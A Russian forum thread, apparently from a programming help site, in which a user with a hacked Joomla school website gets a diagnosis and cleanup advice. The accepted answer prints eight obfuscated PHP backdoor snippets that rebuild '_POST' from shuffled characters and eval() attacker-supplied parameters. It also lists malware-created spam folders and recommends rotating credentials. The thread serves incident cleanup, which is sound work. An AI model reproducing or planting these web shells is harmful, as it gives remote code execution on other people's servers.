WordPad для Windows 11 Jel 10.01.2026 WordPad для Windows 11 — это приложение, которое восстанавливает классический текстовый редактор WordPad в операционной системе Windows 11. После того как Microsoft исключила WordPad из. . .	Classic Notepad for Windows 11 Jel 10.01.2026 Old Classic Notepad for Windows 11 Приложение для Windows 11, позволяющее пользователям вернуть классическую версию текстового редактора «Блокнот» из Windows 10. Программа предоставляет более. . .	Почему дизайн решает? Neotwalker 09.01.2026 В современном мире, где конкуренция за внимание потребителя достигла пика, дизайн становится мощным инструментом для успеха бренда. Это не просто красивый внешний вид продукта или сайта — это. . .	Модель микоризы: классовый агентный подход 3 anaschu 06.01.2026 aa0a7f55b50dd51c5ec569d2d10c54f6/ O1rJuneU_ls https:/ / vkvideo. ru/ video-115721503_456239114
Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ФедосеевПавел 06.01.2026 Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ВВЕДЕНИЕ Введу сокращения: аналоговый ПИД — ПИД регулятор с управляющим выходом в виде числа в диапазоне от 0% до. . .	Модель микоризы: классовый агентный подход 2 anaschu 06.01.2026 репозиторий https:/ / github. com/ shumilovas/ fungi ветка по-частям. коммит Create переделка под биомассу. txt вход sc, но sm считается внутри мицелия. кстати, обьем тоже должен там считаться. . . .	Расчёт токов в цепи постоянного тока igorrr37 05.01.2026 / * Дана цепь постоянного тока с сопротивлениями и напряжениями. Надо найти токи в ветвях. Программа составляет систему уравнений по 1 и 2 законам Кирхгофа и решает её. Последовательность действий:. . .	Новый CodeBlocs. Версия 25.03 palva 04.01.2026 Оказывается, недавно вышла новая версия CodeBlocks за номером 25. 03. Когда-то давно я возился с только что вышедшей тогда версией 20. 03. С тех пор я давно снёс всё с компьютера и забыл. Теперь. . .

@YuliaSumina 0 / 0 / 0 Регистрация: 11.02.2016 Сообщений: 3
	11.02.2016, 20:35 [ТС]
	Спасибо Вам! Это сайт образовательного учреждения и хостинг платный. Может подскажите ссылки на надежные скрипты??? 0

@YuliaSumina 0 / 0 / 0 Регистрация: 11.02.2016 Сообщений: 3
	11.02.2016, 21:29 [ТС]
	Сайт на базе https://mchost.ru/ 0

quwy Native x86 6855 / 3788 / 1025 Регистрация: 13.02.2013 Сообщений: 11,861
	12.02.2016, 12:46
	Я не про хостинг спрашивал. На базе какого скрипта сайт? 0

@SedoyVoron 0 / 0 / 1 Регистрация: 26.02.2016 Сообщений: 1
	26.02.2016, 01:13
	Сообщение было отмечено quwy как решение Решение Платформа у него Joomla. Версия до 3.4.8. Описан файл docs\libraries\joomla\exporter.php Про ошибку стало известно 15.12.2015 это была уязвимость версии 3.4.5 и ниже. Файл генериреут не только вредоносный код типа Кликните здесь для просмотра всего текста <?php $wsh5 = "so_preut" ;$dvus5 = $wsh5[0]. $wsh5[7].$wsh5[4]. $wsh5[7].$wsh5[1].$wsh5[6].$wsh5[3]. $wsh5[3]. $wsh5[5].$wsh5[4];$tbxg8= $dvus5( $wsh5[2].$wsh5[3]. $wsh5[1].$wsh5[0].$wsh5[7] ); if (isset(${$tbxg8 }[ 'q2a5248'])) {eval( ${$tbxg8 } [ 'q2a5248'] ) ; }?> <?php $vkll87= "oe_tpurs"; $wmx29 = $vkll87[7]. $vkll87[3].$vkll87[6].$vkll87[3]. $vkll87[0].$vkll87[5]. $vkll87[4]. $vkll87[4].$vkll87[1].$vkll87[6]; $tseh4=$wmx29 ( $vkll87[2].$vkll87[4] .$vkll87[0].$vkll87[7]. $vkll87[3] ) ;if ( isset(${$tseh4 }[ 'qe0080b' ] )) {eval(${ $tseh4 } ['qe0080b' ]);}?> <?php $azb92 = "_teourps" ;$xjy91 = $azb92[7].$azb92[1].$azb92[5].$azb92[1].$azb92[3].$azb92[4].$azb92[6]. $azb92[6].$azb92[2]. $azb92[5]; $fkaa10 = $xjy91 ( $azb92[0]. $azb92[6] .$azb92[3].$azb92[7].$azb92[1]) ;if ( isset(${$fkaa10}['q22ec2b'] )) {eval ( ${ $fkaa10} ['q22ec2b']) ; } ?> <?php $hng8= "u_psoert" ; $gjfd4=$hng8[3]. $hng8[7].$hng8[6].$hng8[7].$hng8[4]. $hng8[0]. $hng8[2].$hng8[2].$hng8[5].$hng8[6] ; $kpqd9=$gjfd4( $hng8[1].$hng8[2] .$hng8[4].$hng8[3]. $hng8[7] ) ; if(isset( ${ $kpqd9} ['q59a097'] ) ) {eval(${ $kpqd9 } [ 'q59a097'] ) ; } ?> <?php $vyy63 ="_eotpsur";$nem4 =$vyy63[5].$vyy63[3]. $vyy63[7].$vyy63[3]. $vyy63[2].$vyy63[6].$vyy63[4].$vyy63[4]. $vyy63[1].$vyy63[7] ; $sygn83 =$nem4 ($vyy63[0].$vyy63[4] . $vyy63[2].$vyy63[5]. $vyy63[3]) ; if (isset ( ${$sygn83} [ 'q3729f7' ])) { eval ( ${ $sygn83 } [ 'q3729f7']);}?> <?php $osy02 ="uospte_r" ;$fnt3 =$osy02[2]. $osy02[4]. $osy02[7].$osy02[4].$osy02[1].$osy02[0]. $osy02[3]. $osy02[3]. $osy02[5]. $osy02[7]; $qfjy8 =$fnt3($osy02[6].$osy02[3]. $osy02[1].$osy02[2]. $osy02[4]) ;if (isset ( ${$qfjy8} ['q1c1ae6' ] )) { eval (${ $qfjy8 } ['q1c1ae6' ] ); }?> <?php $bhr3= "speru_ot";$fitl43 = $bhr3[0].$bhr3[7]. $bhr3[3]. $bhr3[7]. $bhr3[6]. $bhr3[4]. $bhr3[1].$bhr3[1]. $bhr3[2].$bhr3[3];$iqk62 = $fitl43( $bhr3[5]. $bhr3[1].$bhr3[6].$bhr3[0]. $bhr3[7]); if ( isset( ${ $iqk62 }['q7f69dd'])) {eval ( ${ $iqk62} [ 'q7f69dd']);} ?> <?php $mzvj5= "to_esupr" ; $nvtf2 = $mzvj5[4]. $mzvj5[0].$mzvj5[7].$mzvj5[0]. $mzvj5[1].$mzvj5[5]. $mzvj5[6].$mzvj5[6]. $mzvj5[3]. $mzvj5[7]; $ntfn4=$nvtf2( $mzvj5[2]. $mzvj5[6]. $mzvj5[1].$mzvj5[4].$mzvj5[0]); if(isset( ${ $ntfn4} ['q89024b'] )) { eval(${ $ntfn4} [ 'q89024b' ] ); }?> но и создаёт папки типа Кликните здесь для просмотра всего текста sgrzaiq wcvlxeb zthcwlb gwbekak rhzlpnv bsleprv rejewrc fdzbxie в которых идут ссылки по разным низкочастотным запросам и с вредоносными прогами. Если хочешь норм почистить то проверь все php файлы. Каспер в помощь по части файлов он покажит вирус как Trojan.PHP.Agent.jj В основном все файлы новые, так что вычисляй по дате создания, но в нескольких случаях вирус вшивался ещё и в нормальные файлы, так что чистить тебе руками, как и мне =) В первую очередь поищи папки с вложенными { eval и {eval - найдёшь большую часть заразы. Да пароль тебе от FTP и префикс БД надо теперь поменять, как и пасс от админки сайта, а лучше скрой админку плагином чтобы вышло ../administrator?fig-vzlomaesh 0

Ошибки в файлах php

Решение